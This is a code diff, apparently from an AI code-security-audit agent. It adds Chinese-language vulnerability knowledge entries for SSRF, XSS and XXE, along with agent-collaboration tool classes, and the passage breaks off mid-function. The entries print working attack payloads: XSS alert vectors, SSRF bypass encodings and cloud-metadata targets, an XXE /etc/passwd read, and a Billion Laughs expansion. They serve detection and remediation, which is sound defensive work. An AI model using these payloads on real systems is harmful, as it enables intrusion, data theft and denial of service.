||||
|
||||
### 文件锁
|
||||
```python
|
||||
# 安全 - 使用文件锁
|
||||
import fcntl
|
||||
|
||||
with open(filepath, 'r+') as f:
|
||||
fcntl.flock(f.fileno(), fcntl.LOCK_EX)
|
||||
try:
|
||||
data = f.read()
|
||||
# 处理数据
|
||||
f.seek(0)
|
||||
f.write(new_data)
f.truncate()  # 新数据比旧数据短时,截断残留的旧内容
|
||||
finally:
|
||||
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,118 @@
|
|||
"""
|
||||
SSRF (服务端请求伪造) 漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
SSRF = KnowledgeDocument(
|
||||
id="vuln_ssrf",
|
||||
title="Server-Side Request Forgery (SSRF)",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["ssrf", "request", "url", "network", "internal", "cloud"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-918"],
|
||||
owasp_ids=["A10:2021"],
|
||||
content="""
|
||||
SSRF允许攻击者诱使服务器向内部资源或任意外部地址发起请求。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险 - 直接使用用户URL
|
||||
response = requests.get(user_provided_url)
|
||||
urllib.request.urlopen(url_from_user)
|
||||
httpx.get(user_url)
|
||||
|
||||
# 危险 - URL拼接
|
||||
base_url = "http://internal-api/"
|
||||
requests.get(base_url + user_path)
|
||||
|
||||
# 危险 - 图片/文件获取
|
||||
image_url = request.args.get('url')
|
||||
response = requests.get(image_url)
|
||||
```
|
||||
|
||||
### Node.js
|
||||
```javascript
|
||||
// 危险
|
||||
fetch(req.body.url);
|
||||
axios.get(userUrl);
|
||||
http.get(url, callback);
|
||||
```
|
||||
|
||||
## 攻击目标
|
||||
1. 内部服务 (localhost, 127.0.0.1, 内网IP)
|
||||
2. 云元数据服务
|
||||
- AWS: http://169.254.169.254/latest/meta-data/
|
||||
- GCP: http://metadata.google.internal/
|
||||
- Azure: http://169.254.169.254/metadata/
|
||||
3. 内部API和数据库
|
||||
4. 文件协议 (file://)
|
||||
|
||||
## 绕过技术
|
||||
```
|
||||
# IP绕过
|
||||
http://127.0.0.1 -> http://127.1 -> http://0
|
||||
http://localhost -> http://[::1]
|
||||
http://2130706433 (十进制)
|
||||
http://0x7f000001 (十六进制)
|
||||
|
||||
# DNS重绑定
|
||||
attacker.com -> 解析到内网IP
|
||||
|
||||
# URL解析差异
|
||||
http://evil.com@internal/
|
||||
http://internal#@evil.com
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 所有发起HTTP请求的地方
|
||||
2. URL参数是否来自用户
|
||||
3. 是否有URL白名单验证
|
||||
4. 是否限制了协议和端口
|
||||
|
||||
## 安全实践
|
||||
1. URL白名单验证
|
||||
2. 禁止访问内部IP地址
|
||||
3. 使用DNS解析验证
|
||||
4. 限制协议(仅http/https)
|
||||
5. 禁用重定向或限制重定向
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
import ipaddress
|
||||
from urllib.parse import urlparse
|
||||
|
||||
def is_safe_url(url):
|
||||
try:
|
||||
parsed = urlparse(url)
|
||||
|
||||
# 只允许http/https
|
||||
if parsed.scheme not in ['http', 'https']:
|
||||
return False
|
||||
|
||||
# 解析IP
|
||||
import socket
|
||||
ip = socket.gethostbyname(parsed.hostname)
|
||||
ip_obj = ipaddress.ip_address(ip)
|
||||
|
||||
# 禁止私有IP
|
||||
if ip_obj.is_private or ip_obj.is_loopback:
|
||||
return False
|
||||
|
||||
# 白名单域名
|
||||
if parsed.hostname not in ALLOWED_HOSTS:
|
||||
return False
|
||||
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
# 使用(注意:is_safe_url 与 requests 会各自解析一次DNS,两次解析之间仍存在DNS重绑定窗口;高风险场景应直接连接到已校验的IP)
|
||||
if is_safe_url(user_url):
|
||||
response = requests.get(user_url, allow_redirects=False)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,205 @@
|
|||
"""
|
||||
XSS (跨站脚本) 漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
XSS_REFLECTED = KnowledgeDocument(
|
||||
id="vuln_xss_reflected",
|
||||
title="Reflected XSS",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xss", "reflected", "javascript", "html", "injection"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-79"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
反射型XSS:恶意脚本来自当前HTTP请求,服务器将用户输入直接反射到响应中。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python/Flask
|
||||
```python
|
||||
# 危险 - 直接返回用户输入
|
||||
@app.route('/search')
|
||||
def search():
|
||||
query = request.args.get('q')
|
||||
return f"<h1>搜索结果: {query}</h1>"
|
||||
|
||||
# 危险 - 禁用自动转义
|
||||
return render_template_string(user_input)
|
||||
return Markup(user_input)
|
||||
```
|
||||
|
||||
### JavaScript/Express
|
||||
```javascript
|
||||
// 危险
|
||||
res.send(`<h1>Hello ${req.query.name}</h1>`);
|
||||
res.write(req.body.content);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
echo "Hello " . $_GET['name'];
|
||||
print($_POST['content']);
|
||||
```
|
||||
|
||||
## 攻击载荷
|
||||
```html
|
||||
<script>alert('XSS')</script>
|
||||
<img src=x onerror=alert('XSS')>
|
||||
<svg onload=alert('XSS')>
|
||||
javascript:alert('XSS')
|
||||
<body onload=alert('XSS')>
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 输出编码/HTML转义
|
||||
2. 使用模板引擎的自动转义
|
||||
3. Content-Type设置正确
|
||||
4. 使用CSP头
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 使用escape
|
||||
from markupsafe import escape
|
||||
return f"<h1>搜索结果: {escape(query)}</h1>"
|
||||
|
||||
# 安全 - 使用模板(自动转义)
|
||||
return render_template('search.html', query=query)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
XSS_STORED = KnowledgeDocument(
|
||||
id="vuln_xss_stored",
|
||||
title="Stored XSS",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xss", "stored", "persistent", "javascript", "database"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-79"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
存储型XSS:恶意脚本被存储在服务器(数据库、文件等),当其他用户访问时执行。
|
||||
|
||||
## 危险场景
|
||||
- 用户评论/留言板
|
||||
- 用户个人资料
|
||||
- 论坛帖子
|
||||
- 文件名/描述
|
||||
- 日志查看器
|
||||
|
||||
## 危险模式
|
||||
```python
|
||||
# 危险 - 存储未过滤的用户输入
|
||||
comment = request.form['comment']
|
||||
db.save_comment(comment) # 存储
|
||||
|
||||
# 危险 - 显示未转义的内容
|
||||
comments = db.get_comments()
|
||||
return render_template_string(f"<div>{comments}</div>")
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 追踪用户输入到数据库的流程
|
||||
2. 检查从数据库读取后的输出处理
|
||||
3. 关注富文本编辑器的处理
|
||||
4. 检查管理后台的数据展示
|
||||
|
||||
## 安全实践
|
||||
1. 输入时过滤/存储时转义
|
||||
2. 输出时始终转义
|
||||
3. 使用白名单HTML标签(如需富文本)
|
||||
4. 使用DOMPurify等库清理HTML
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 使用bleach清理HTML
|
||||
import bleach
|
||||
clean_comment = bleach.clean(comment, tags=['p', 'b', 'i'])
|
||||
db.save_comment(clean_comment)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
XSS_DOM = KnowledgeDocument(
|
||||
id="vuln_xss_dom",
|
||||
title="DOM-based XSS",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xss", "dom", "javascript", "client-side"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-79"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
DOM型XSS:漏洞存在于客户端JavaScript代码,通过修改DOM环境执行恶意脚本。
|
||||
|
||||
## 危险源 (Sources)
|
||||
```javascript
|
||||
// URL相关
|
||||
location.href
|
||||
location.search
|
||||
location.hash
|
||||
document.URL
|
||||
document.referrer
|
||||
|
||||
// 存储相关
|
||||
localStorage.getItem()
|
||||
sessionStorage.getItem()
|
||||
|
||||
// 消息相关
|
||||
window.postMessage
|
||||
```
|
||||
|
||||
## 危险汇 (Sinks)
|
||||
```javascript
|
||||
// 危险 - HTML注入
|
||||
element.innerHTML = userInput;
|
||||
element.outerHTML = userInput;
|
||||
document.write(userInput);
|
||||
document.writeln(userInput);
|
||||
|
||||
// 危险 - JavaScript执行
|
||||
eval(userInput);
|
||||
setTimeout(userInput, 1000);
|
||||
setInterval(userInput, 1000);
|
||||
new Function(userInput);
|
||||
|
||||
// 危险 - URL跳转
|
||||
location.href = userInput;
|
||||
location.assign(userInput);
|
||||
window.open(userInput);
|
||||
```
|
||||
|
||||
## 危险模式
|
||||
```javascript
|
||||
// 危险 - 从URL获取并直接使用
|
||||
const name = new URLSearchParams(location.search).get('name');
|
||||
document.getElementById('greeting').innerHTML = 'Hello ' + name;
|
||||
|
||||
// 危险 - hash注入
|
||||
const hash = location.hash.substring(1);
|
||||
document.getElementById('content').innerHTML = decodeURIComponent(hash);
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 使用textContent代替innerHTML
|
||||
2. 使用安全的DOM API
|
||||
3. 对URL参数进行验证
|
||||
4. 使用DOMPurify清理HTML
|
||||
|
||||
## 修复示例
|
||||
```javascript
|
||||
// 安全 - 使用textContent
|
||||
element.textContent = userInput;
|
||||
|
||||
// 安全 - 使用DOMPurify
|
||||
element.innerHTML = DOMPurify.sanitize(userInput);
|
||||
|
||||
// 安全 - 创建文本节点
|
||||
element.appendChild(document.createTextNode(userInput));
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,129 @@
|
|||
"""
|
||||
XXE (XML外部实体注入) 漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
XXE = KnowledgeDocument(
|
||||
id="vuln_xxe",
|
||||
title="XML External Entity (XXE) Injection",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["xxe", "xml", "entity", "injection", "ssrf"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-611"],
|
||||
owasp_ids=["A05:2021"],
|
||||
content="""
|
||||
XXE允许攻击者通过XML外部实体读取服务器文件、执行SSRF攻击或导致拒绝服务。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险 - lxml默认配置
|
||||
from lxml import etree
|
||||
doc = etree.parse(user_xml)
|
||||
doc = etree.fromstring(user_xml)
|
||||
|
||||
# 危险 - xml.etree(不会展开外部实体,但在旧版 Expat 下仍受 Billion Laughs 等实体膨胀攻击影响)
|
||||
import xml.etree.ElementTree as ET
|
||||
ET.parse(user_xml)
|
||||
|
||||
# 危险 - xml.dom
|
||||
from xml.dom import minidom
|
||||
minidom.parseString(user_xml)
|
||||
```
|
||||
|
||||
### Java
|
||||
```java
|
||||
// 危险 - DocumentBuilder默认配置
|
||||
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
|
||||
DocumentBuilder db = dbf.newDocumentBuilder();
|
||||
Document doc = db.parse(userInput);
|
||||
|
||||
// 危险 - SAXParser
|
||||
SAXParserFactory spf = SAXParserFactory.newInstance();
|
||||
SAXParser parser = spf.newSAXParser();
|
||||
parser.parse(userInput, handler);
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
$doc = simplexml_load_string($xml);
|
||||
$doc = new DOMDocument();
|
||||
$doc->loadXML($xml);
|
||||
```
|
||||
|
||||
## 攻击载荷
|
||||
|
||||
### 文件读取
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
||||
]>
|
||||
<root>&xxe;</root>
|
||||
```
|
||||
|
||||
### SSRF
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ENTITY xxe SYSTEM "http://internal-server/api">
|
||||
]>
|
||||
<root>&xxe;</root>
|
||||
```
|
||||
|
||||
### 拒绝服务 (Billion Laughs)
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE lolz [
|
||||
<!ENTITY lol "lol">
|
||||
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
|
||||
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
|
||||
]>
|
||||
<root>&lol3;</root>
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 所有XML解析代码
|
||||
2. 是否禁用了外部实体
|
||||
3. 是否禁用了DTD处理
|
||||
4. 用户输入是否直接解析
|
||||
|
||||
## 安全实践
|
||||
1. 禁用外部实体
|
||||
2. 禁用DTD处理
|
||||
3. 使用JSON代替XML
|
||||
4. 输入验证
|
||||
|
||||
## 修复示例
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 安全 - lxml禁用实体
|
||||
from lxml import etree
|
||||
parser = etree.XMLParser(
|
||||
resolve_entities=False,
|
||||
no_network=True,
|
||||
dtd_validation=False,
|
||||
load_dtd=False
|
||||
)
|
||||
doc = etree.parse(user_xml, parser)
|
||||
|
||||
# 安全 - defusedxml
|
||||
import defusedxml.ElementTree as ET
|
||||
doc = ET.parse(user_xml)
|
||||
```
|
||||
|
||||
### Java
|
||||
```java
|
||||
// 安全 - 禁用外部实体
|
||||
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
|
||||
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
|
||||
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
|
||||
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -34,7 +34,7 @@ ORCHESTRATOR_SYSTEM_PROMPT = """你是一个专业的代码安全审计 Agent,
|
|||
## 分析方法
|
||||
1. **快速扫描**: 首先使用 pattern_match 快速发现可疑代码
|
||||
2. **语义搜索**: 使用 rag_query 查找相关上下文
|
||||
3. **深度分析**: 对可疑代码使用 code_analysis 深入分析
|
||||
3. **深度分析**: 对可疑代码使用 read_file 读取并分析
|
||||
4. **数据流追踪**: 追踪用户输入到危险函数的路径
|
||||
5. **漏洞验证**: 在沙箱中验证发现的漏洞
|
||||
|
||||
|
|
@ -67,7 +67,6 @@ ANALYSIS_SYSTEM_PROMPT = """你是一个专注于代码漏洞分析的安全专
|
|||
## 可用工具
|
||||
- rag_query: 语义搜索相关代码
|
||||
- pattern_match: 快速模式匹配
|
||||
- code_analysis: LLM 深度分析
|
||||
- read_file: 读取文件内容
|
||||
- search_code: 关键字搜索
|
||||
- dataflow_analysis: 数据流分析
|
||||
|
|
|
|||
|
|
@ -1,7 +1,12 @@
|
|||
"""
|
||||
Agent 工具集
|
||||
提供 LangChain Agent 使用的各种工具
|
||||
包括内置工具和外部安全工具
|
||||
|
||||
提供 Agent 使用的各种工具,包括:
|
||||
- 基础工具(文件操作、代码搜索)
|
||||
- 分析工具(模式匹配、数据流分析)
|
||||
- 外部安全工具(Semgrep、Bandit等)
|
||||
- 协作工具(Think、Agent通信)
|
||||
- 报告工具(漏洞报告)
|
||||
"""
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
|
@ -22,6 +27,23 @@ from .external_tools import (
|
|||
OSVScannerTool,
|
||||
)
|
||||
|
||||
# 🔥 新增:思考和推理工具
|
||||
from .thinking_tool import ThinkTool, ReflectTool
|
||||
|
||||
# 🔥 新增:漏洞报告工具
|
||||
from .reporting_tool import CreateVulnerabilityReportTool
|
||||
|
||||
# 🔥 新增:Agent协作工具
|
||||
from .agent_tools import (
|
||||
CreateSubAgentTool,
|
||||
SendMessageTool,
|
||||
ViewAgentGraphTool,
|
||||
WaitForMessageTool,
|
||||
AgentFinishTool,
|
||||
RunSubAgentsTool,
|
||||
CollectSubAgentResultsTool,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# 基础
|
||||
"AgentTool",
|
||||
|
|
@ -57,5 +79,21 @@ __all__ = [
|
|||
"SafetyTool",
|
||||
"TruffleHogTool",
|
||||
"OSVScannerTool",
|
||||
|
||||
# 🔥 思考和推理工具
|
||||
"ThinkTool",
|
||||
"ReflectTool",
|
||||
|
||||
# 🔥 漏洞报告工具
|
||||
"CreateVulnerabilityReportTool",
|
||||
|
||||
# 🔥 Agent协作工具
|
||||
"CreateSubAgentTool",
|
||||
"SendMessageTool",
|
||||
"ViewAgentGraphTool",
|
||||
"WaitForMessageTool",
|
||||
"AgentFinishTool",
|
||||
"RunSubAgentsTool",
|
||||
"CollectSubAgentResultsTool",
|
||||
]
|
||||
|
||||
|
|
|
|||
|
|
@ -0,0 +1,785 @@
|
|||
"""
|
||||
Agent 协作工具
|
||||
|
||||
提供动态Agent创建、通信和管理功能
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Optional, List, Dict, Any
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
from ..core.registry import agent_registry
|
||||
from ..core.message import message_bus, MessageType, MessagePriority
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CreateAgentInput(BaseModel):
    """创建Agent输入参数"""
    # Input schema returned by CreateSubAgentTool.args_schema.
    # The docstring above is kept verbatim: pydantic publishes a model's
    # docstring as the schema description, so it is runtime text.

    # Display name of the new agent (required).
    name: str = Field(..., description="Agent名称")

    # Task the new agent is asked to perform (required).
    task: str = Field(..., description="任务描述")

    # Kind of agent to create; falls back to "specialist" when omitted.
    agent_type: str = Field(
        default="specialist",
        description="Agent类型: analysis(分析), verification(验证), specialist(专家)",
    )

    # Comma-separated knowledge module names; the tool rejects more than five.
    knowledge_modules: Optional[str] = Field(
        default=None,
        description="知识模块,逗号分隔,最多5个。如: sql_injection,xss,authentication",
    )

    # Whether the child should inherit the parent's context.
    inherit_context: bool = Field(default=True, description="是否继承父Agent的上下文")

    # When true the agent is run right after creation instead of only registered.
    execute_immediately: bool = Field(
        default=False,
        description="是否立即执行子Agent(否则只创建不执行)",
    )

    # Arbitrary context payload handed to the child agent.
    context: Optional[Dict[str, Any]] = Field(
        default=None,
        description="传递给子Agent的上下文数据",
    )
|
||||
|
||||
|
||||
class CreateSubAgentTool(AgentTool):
    """
    Tool that lets an agent create a specialised sub-agent for a given task.

    The sub-agent is registered in ``agent_registry`` under the parent's ID,
    gets its own queue on ``message_bus`` and may be given up to five
    knowledge modules.

    Two modes are supported:
    1. Create only: the agent is registered but not run (it can be run later).
    2. Execute immediately: the agent is created, run through a
       ``SubAgentExecutor`` and its result is returned.
    """

    def __init__(
        self,
        parent_agent_id: str,
        llm_service=None,
        tools: Optional[Dict[str, Any]] = None,
        event_emitter=None,
    ):
        """
        Args:
            parent_agent_id: ID of the agent that owns this tool; recorded as
                the parent of every agent created through it.
            llm_service: LLM service handed to the sub-agent executor. Without
                it no executor is built and immediate execution is skipped.
            tools: Tool mapping handed to the sub-agent executor.
            event_emitter: Event emitter handed to the sub-agent executor.
        """
        super().__init__()
        self.parent_agent_id = parent_agent_id
        self.llm_service = llm_service
        self.tools = tools or {}
        self.event_emitter = event_emitter

        # Sub-agent executor, built lazily on first use.
        self._sub_executor = None

    def _get_executor(self):
        """Return the cached ``SubAgentExecutor``, building it on first use.

        Returns ``None`` when no LLM service was supplied or the parent agent
        cannot be found in the registry.
        """
        if self._sub_executor is None and self.llm_service:
            from ..core.executor import SubAgentExecutor

            # The executor needs the live parent agent instance.
            parent_agent = agent_registry.get_agent(self.parent_agent_id)
            if parent_agent:
                self._sub_executor = SubAgentExecutor(
                    parent_agent=parent_agent,
                    llm_service=self.llm_service,
                    tools=self.tools,
                    event_emitter=self.event_emitter,
                )
        return self._sub_executor

    @property
    def name(self) -> str:
        return "create_sub_agent"

    @property
    def description(self) -> str:
        return """创建专业化的子Agent来处理特定任务。

使用场景:
1. 发现需要深入分析的特定漏洞类型
2. 需要专业知识来验证某个发现
3. 任务过于复杂需要分解

参数:
- name: Agent名称(如 "SQL注入专家")
- task: 具体任务描述
- agent_type: Agent类型 (analysis/verification/specialist)
- knowledge_modules: 知识模块,逗号分隔(如 "sql_injection,database_security")
- inherit_context: 是否继承当前上下文
- execute_immediately: 是否立即执行(默认false,仅创建)
- context: 传递给子Agent的上下文数据

注意:每个Agent最多加载5个知识模块。"""

    @property
    def args_schema(self):
        return CreateAgentInput

    async def _execute(
        self,
        name: str,
        task: str,
        agent_type: str = "specialist",
        knowledge_modules: Optional[str] = None,
        inherit_context: bool = True,
        execute_immediately: bool = False,
        context: Optional[Dict[str, Any]] = None,
        **kwargs
    ) -> ToolResult:
        """Create a sub-agent and optionally run it right away.

        Args:
            name: Agent name; must not be blank.
            task: Task description; must not be blank.
            agent_type: Agent type recorded in the registry. For immediate
                execution anything other than "analysis"/"verification" is
                run as "analysis".
            knowledge_modules: Comma-separated module names (at most five).
            inherit_context: Accepted for interface compatibility; not read
                by this method.
            execute_immediately: Run the agent after registering it.
            context: Extra context for the executor; it is copied, never
                mutated.

        Returns:
            A ``ToolResult`` describing the created agent, or the execution
            outcome when the agent was run. Validation problems are reported
            as ``success=False`` results.

        Raises:
            Exception: whatever the executor raises; the agent is marked
                "failed" in the registry before the exception propagates.
        """
        if not name or not name.strip():
            return ToolResult(success=False, error="Agent名称不能为空")

        if not task or not task.strip():
            return ToolResult(success=False, error="任务描述不能为空")

        # Parse the comma-separated module list, dropping empty entries.
        modules = []
        if knowledge_modules:
            modules = [m.strip() for m in knowledge_modules.split(",") if m.strip()]
            if len(modules) > 5:
                return ToolResult(
                    success=False,
                    error="知识模块数量不能超过5个"
                )

        # Reject unknown module names before anything is registered.
        if modules:
            from ..knowledge import knowledge_loader
            validation = knowledge_loader.validate_modules(modules)
            if validation["invalid"]:
                available = knowledge_loader.get_all_module_names()
                return ToolResult(
                    success=False,
                    error=f"无效的知识模块: {validation['invalid']}。可用模块: {', '.join(available)}"
                )

        from ..core.state import _generate_agent_id
        agent_id = _generate_agent_id()

        # Register the agent under its parent and give it a message queue.
        node = agent_registry.register_agent(
            agent_id=agent_id,
            agent_name=name.strip(),
            agent_type=agent_type,
            task=task.strip(),
            parent_id=self.parent_agent_id,
            knowledge_modules=modules,
        )
        message_bus.create_queue(agent_id)

        logger.info(f"Created sub-agent: {name} ({agent_id}), parent: {self.parent_agent_id}")

        if execute_immediately:
            executor = self._get_executor()
            if executor:
                # Copy the context so the caller's dict is never modified.
                exec_context = dict(context or {})
                exec_context["knowledge_modules"] = modules

                try:
                    exec_result = await executor.create_and_run_sub_agent(
                        agent_type=agent_type if agent_type in ["analysis", "verification"] else "analysis",
                        task=task.strip(),
                        context=exec_context,
                        knowledge_modules=modules,
                    )
                except Exception as exc:
                    # Do not leave the registered agent in a non-terminal
                    # state when the executor blows up; then re-raise.
                    agent_registry.update_agent_status(agent_id, "failed", {"error": str(exc)})
                    raise

                if exec_result.get("success"):
                    agent_registry.update_agent_status(agent_id, "completed", exec_result)
                else:
                    agent_registry.update_agent_status(agent_id, "failed", {"error": exec_result.get("error")})

                # "data" may be present but None; treat that as no findings.
                result_data = exec_result.get("data") or {}

                return ToolResult(
                    success=exec_result.get("success", False),
                    data={
                        "message": f"子Agent '{name}' 已执行完成" if exec_result.get("success") else f"子Agent '{name}' 执行失败",
                        "agent_id": agent_id,
                        "execution_result": exec_result,
                        "findings": result_data.get("findings", []) if exec_result.get("success") else [],
                    },
                    error=exec_result.get("error"),
                    metadata=node,
                )
            else:
                # No executor: fall through and report the agent as created.
                logger.warning("SubAgentExecutor not available, agent created but not executed")

        return ToolResult(
            success=True,
            data={
                "message": f"子Agent '{name}' 已创建",
                "agent_id": agent_id,
                "agent_info": {
                    "id": agent_id,
                    "name": name,
                    "type": agent_type,
                    "task": task[:100],
                    "knowledge_modules": modules,
                    "parent_id": self.parent_agent_id,
                    "status": "created",
                }
            },
            metadata=node,
        )
|
||||
|
||||
|
||||
class SendMessageInput(BaseModel):
    """发送消息输入参数"""
    # Input schema returned by SendMessageTool.args_schema.
    # The docstring above is kept verbatim: pydantic publishes a model's
    # docstring as the schema description, so it is runtime text.

    # ID of the agent that should receive the message (required).
    target_agent_id: str = Field(..., description="目标Agent ID")

    # Message body (required).
    message: str = Field(..., description="消息内容")

    # Message kind; defaults to "information".
    message_type: str = Field(
        default="information",
        description="消息类型: query(查询), instruction(指令), information(信息)",
    )

    # Delivery priority; defaults to "normal".
    priority: str = Field(default="normal", description="优先级: low, normal, high, urgent")
|
||||
|
||||
|
||||
class SendMessageTool(AgentTool):
    """
    Tool for agent-to-agent messaging.

    Sends a message from the owning agent to another registered agent via
    ``message_bus``.
    """

    def __init__(self, sender_agent_id: str):
        super().__init__()
        # Used as the ``from_agent`` of every message this tool sends.
        self.sender_agent_id = sender_agent_id

    @property
    def name(self) -> str:
        return "send_message"

    @property
    def description(self) -> str:
        return """向其他Agent发送消息。

使用场景:
1. 向子Agent发送指令
2. 向父Agent报告进展
3. 请求其他Agent提供信息

参数:
- target_agent_id: 目标Agent的ID
- message: 消息内容
- message_type: 消息类型 (query/instruction/information)
- priority: 优先级 (low/normal/high/urgent)"""

    @property
    def args_schema(self):
        return SendMessageInput

    @staticmethod
    def _coerce_enum(enum_cls, raw_value, fallback):
        """Return ``enum_cls(raw_value)``, or ``fallback`` if that raises ``ValueError``."""
        try:
            return enum_cls(raw_value)
        except ValueError:
            return fallback

    async def _execute(
        self,
        target_agent_id: str,
        message: str,
        message_type: str = "information",
        priority: str = "normal",
        **kwargs
    ) -> ToolResult:
        """Validate the request and send the message to the target agent.

        Unknown ``message_type`` / ``priority`` values silently fall back to
        ``MessageType.INFORMATION`` / ``MessagePriority.NORMAL``.

        Returns:
            A failed ``ToolResult`` when the target ID or message is empty or
            the target is not registered; otherwise a successful result with
            the message ID and a summary of the target agent.
        """
        if not target_agent_id:
            return ToolResult(success=False, error="目标Agent ID不能为空")

        if not message or not message.strip():
            return ToolResult(success=False, error="消息内容不能为空")

        # The recipient must be known to the registry.
        recipient = agent_registry.get_agent_node(target_agent_id)
        if not recipient:
            return ToolResult(
                success=False,
                error=f"目标Agent '{target_agent_id}' 不存在",
            )

        # Map the free-form strings onto the bus enums, with defaults.
        kind = self._coerce_enum(MessageType, message_type, MessageType.INFORMATION)
        level = self._coerce_enum(MessagePriority, priority, MessagePriority.NORMAL)

        delivered = message_bus.send_message(
            from_agent=self.sender_agent_id,
            to_agent=target_agent_id,
            content=message.strip(),
            message_type=kind,
            priority=level,
        )

        payload = {
            "message": f"消息已发送到 '{recipient['name']}'",
            "message_id": delivered.id,
            "target_agent": {
                "id": target_agent_id,
                "name": recipient["name"],
                "status": recipient["status"],
            },
        }
        return ToolResult(success=True, data=payload, metadata=delivered.to_dict())
|
||||
|
||||
|
||||
class ViewAgentGraphTool(AgentTool):
    """
    Tool that reports the current agent tree.

    Returns the registry's tree view and statistics together with the ID of
    the agent that owns this tool.
    """

    def __init__(self, current_agent_id: str):
        super().__init__()
        # Echoed back in every result.
        self.current_agent_id = current_agent_id

    @property
    def name(self) -> str:
        return "view_agent_graph"

    @property
    def description(self) -> str:
        return """查看当前的Agent树结构和状态。

显示:
- 所有Agent及其层级关系
- 每个Agent的状态和任务
- 加载的知识模块"""

    @property
    def args_schema(self):
        # This tool takes no arguments.
        return None

    async def _execute(self, **kwargs) -> ToolResult:
        """Collect the registry's tree view and statistics into one result."""
        graph = agent_registry.get_agent_tree_view()
        summary = agent_registry.get_statistics()

        payload = {
            "graph_structure": graph,
            "summary": summary,
            "current_agent_id": self.current_agent_id,
        }
        return ToolResult(success=True, data=payload)
|
||||
|
||||
|
||||
class WaitForMessageInput(BaseModel):
    """等待消息输入参数"""
    # Input schema for WaitForMessageTool. The docstring and field description
    # are schema text, so they follow the language of the sibling input models.

    # Why the agent is waiting; same default as WaitForMessageTool._execute.
    reason: str = Field(default="等待消息", description="等待原因")


class WaitForMessageTool(AgentTool):
    """
    Tool that puts an agent into the waiting state.

    Marks the agent as "waiting" in ``agent_registry`` (and on its state
    object, when one was supplied) so that it can wait for messages.
    """

    def __init__(self, agent_id: str, agent_state=None):
        """
        Args:
            agent_id: ID of the agent that owns this tool.
            agent_state: Optional state object; when given, its
                ``enter_waiting_state`` is called with the reason.
        """
        super().__init__()
        self.agent_id = agent_id
        self.agent_state = agent_state

    @property
    def name(self) -> str:
        return "wait_for_message"

    @property
    def description(self) -> str:
        return """进入等待状态,等待其他Agent或用户的消息。

使用场景:
1. 等待子Agent完成任务并报告
2. 等待用户提供更多信息
3. 等待其他Agent的协作响应

参数:
- reason: 等待原因"""

    @property
    def args_schema(self):
        # The description advertises a ``reason`` parameter, so expose it in
        # the schema as well (previously None, which hid the parameter).
        return WaitForMessageInput

    async def _execute(
        self,
        reason: str = "等待消息",
        **kwargs
    ) -> ToolResult:
        """Switch the agent to the waiting state and report it.

        Args:
            reason: Why the agent is waiting; included in the result message.

        Returns:
            A successful ``ToolResult`` with the waiting status, the agent ID
            and the list of resume conditions.
        """
        # Update the in-memory agent state first, if we have one.
        if self.agent_state:
            self.agent_state.enter_waiting_state(reason)

